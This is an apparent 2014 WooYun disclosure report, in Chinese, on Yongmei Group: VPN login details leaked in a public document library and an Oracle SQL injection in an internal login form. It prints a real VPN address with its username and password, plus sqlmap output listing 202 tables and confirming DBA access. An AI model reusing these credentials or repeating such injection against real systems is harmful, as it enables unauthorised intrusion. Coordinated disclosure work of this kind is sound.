当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064027

漏洞标题:永煤集团VPN登录信息泄漏内部系统存在SQL注入

相关厂商:永煤集团

漏洞作者: RedFree

提交时间:2014-06-08 10:28

修复时间:2014-07-23 22:08

公开时间:2014-07-23 22:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-08: 细节已通知厂商并且等待厂商处理中
2014-06-12: 厂商已经确认,细节仅向厂商公开
2014-06-22: 细节向核心白帽子及相关领域专家公开
2014-07-02: 细节向普通白帽子公开
2014-07-12: 细节向实习白帽子公开
2014-07-23: 细节向公众公开

简要描述:

永煤集团将VPN登录说明文档上传于文库,其他人可以使用VPN访问其内网资源。且其内部系统安全欠佳。

详细说明:

VPN登录地址:http://vpn.ycmd.com.cn/
用户名:ymgs 密码:123456

1.jpg


2.jpg


登录框处Oracle注入:

3.jpg


[10:04:22] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:04:22] [INFO] fetching tables for databas
[10:04:22] [INFO] the SQL query used returns
Database: GJJXT
[202 tables]
+------------------------+
| CZ_DWXXB |
| CZ_DYBGQC |
| CZ_DYHJS |
| CZ_GRXXB |
| F_DXQFTEMP |
| F_HKTXB |
| F_SJHMDSZB |
| F_SMSSEND |
| F_SMSUSER |
| SYRQ |
| SYS_LOG |
| TBILOABELONGBANK |
| TBLLOABANK |
| TBLLOAINTR |
| TBLLOARETMODE |
| TEMP_CJKBU_130829 |
| TEMP_EXCPZBH |
| TEMP_INDEXPZ |
| TEMP_MHKH130829 |
| TEMP_NEWIDCARD_0370035 |
| TEMP_PZBHTH |
| TEMP_PZBHTH1 |
| TEMP_PZBH_130929 |
| TEMP_PZHZ_130926_01 |
| TEMP_PZHZ_130926_02 |
| TEMP_PZHZ_130926_03 |
| TEMP_PZHZ_130926_04 |
| TEMP_PZJHZJB_130901 |
| TEMP_PZJH_130901 |
| TEMP_PZPX_130903 |
| TEMP_PZPX_131008 |
| TEMP_PZTH_130901 |
| TMENU |
| TMP_IDCARD |
| TPERMIT |
| TROLE |
| TROLEPERMIT |
| TUSERROLE |
| V_BBSZB |
| V_BZDWB |
| V_CWMXZ |
| V_DBFSB |
| V_DBGSB |
| V_DKDBHDYBB |
| V_DKDYB |
| V_DKFKBHIS |
| V_DKFKBTMP |
| V_DKHTB |
| V_DKHTBH |
| V_DKKKBHIS |
| V_DKKKBTMP |
| V_DKQKB |
| V_DKQKYQBFB |
| V_DKSJLSB |
| V_DKSQB |
| V_DKXTCSB |
| V_DKYQYBB |
| V_DKZJB |
| V_DKZLSCB |
| V_DKZQYBB |
| V_DWXZB |
| V_DYSQB |
| V_FCXZB |
| V_FXLVB |
| V_GRDBB |
| V_HKMXB |
| V_HKMXBAY |
| V_HKMXBHIS |
| V_HKMXBTEMP |
| V_HMD |
| V_HPTMP |
| V_JGBBYBB |
| V_JGDKQXQKB |
| V_JGDKQXQKB3 |
| V_JGDKYBB |
| V_JGKHQKYBB |
| V_JGWYJCYBB |
| V_JGWYJEBLB |
| V_JGWYJEBLB3 |
| V_JGWYKHBLB |
| V_JGWYKHBLB3 |
| V_JGZLJCYBB |
| V_JGZLJCYBB5 |
| V_JZJFSQB |
| V_JZPZB |
| V_JZPZBTEMP |
| V_JZPZLSB |
| V_KFSBANB |
| V_KKHPBHIS |
| V_KKHPBTMP |
| V_KMB |
| V_KMJB |
| V_KMLB |
| V_KMYEB |
| V_KZB |
| V_LBSQB |
| V_LPXXB |
| V_OTHER_KKHPDATA |
| V_PZZB |
| V_QHTSJHDB |
| V_QSTMP |
| V_SQDKYBB1 |
| V_TQHKYYB |
| V_XGMXB |
| V_XYJBB |
| V_YHDKQXQKB |
| V_YHDKQXQKB3 |
| V_YHDKYBB |
| V_YHHKQKYBB |
| V_YHRJB |
| V_YHRJZ |
| V_YHWYJCYBB |
| V_YHWYJEBLB |
| V_YHWYJEBLB3 |
| V_YHWYKHBLB |
| V_YHWYKHBLB3 |
| V_YHYJB |
| V_YHZLJCYBB |
| V_YHZLJCYBB5 |
| V_YQMXB |
| V_ZBZLB |
| V_ZCFZB |
| V_ZFGJJTJBX |
| V_ZFGJJYBB |
| V_ZFGJJZJBBB |
| V_ZHKSYEB |
| V_ZHSL |
| V_ZHYBB |
| V_ZPZLB |
| V_ZQHDMXB |
| V_ZQQYB |
| V_ZYSZB |
| V_ZZSYB |
| V_ZZSYFPB |
| YZ_CJDB |
| YZ_CSB |
| YZ_CZY |
| YZ_DWGRJJBFB |
| YZ_DWJCYSB |
| YZ_DWJXB |
| YZ_DWMXB |
| YZ_DWQKB |
| YZ_DWQKBCHANGE |
| YZ_DWXZB |
| YZ_DWYEQKB |
| YZ_FKDWZHB |
| YZ_FSFSB |
| YZ_GLB |
| YZ_GRBJMXB |
| YZ_GRJXB |
| YZ_GRJZB |
| YZ_GRLSJS |
| YZ_GRMXB |
| YZ_GRMXBAY |
| YZ_GRQKB |
| YZ_GRQKBCHANGE |
| YZ_GRXXBGB |
| YZ_GZB |
| YZ_GZQKTJB_YB |
| YZ_HISDWGRJJBFB |
| YZ_HISDWJXB |
| YZ_HISDWMXB |
| YZ_HISGRJXB |
| YZ_HISGRMXB |
| YZ_HISGZB |
| YZ_HISJZB |
| YZ_HISJZD |
| YZ_HISJZHB |
| YZ_HISZQMXB |
| YZ_HYB |
| YZ_JCYBB |
| YZ_JSB |
| YZ_JSTZ |
| YZ_JZB |
| YZ_JZBHTEMP |
| YZ_JZD |
| YZ_JZFSB |
| YZ_JZHB |
| YZ_KMB |
| YZ_LLBDB |
| YZ_NDJXB |
| YZ_QU |
| YZ_RJDHZB |
| YZ_RJDMXB |
| YZ_RJDYWMXB |
| YZ_TODAYJZB |
| YZ_TODAYJZD |
| YZ_WDB |
| YZ_XTB |
| YZ_YEYBB |
| YZ_YTLXB |
| YZ_ZJB |
| YZ_ZQBANB |
| YZ_ZQDB |
| YZ_ZQGFLXB |
| YZ_ZQMXB |
| YZ_ZQYBB |
| YZ_ZQYYB |
| YZ_ZQZGLBB |
| YZ_ZTDYB |
| YZ_ZXB |
| YZ_ZYQKB |
+------------------------+


[10:05:50] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:05:50] [INFO] testing if current user is DBA
current user is DBA: True


4.jpg

漏洞证明:

1.jpg


2.jpg


3.jpg

修复方案:

VPN登录信息修改下,不要再侧漏了。

版权声明:转载请注明来源 RedFree@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-06-12 16:17

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心处置。按多个漏洞进行评分,rank 14

最新状态:

暂无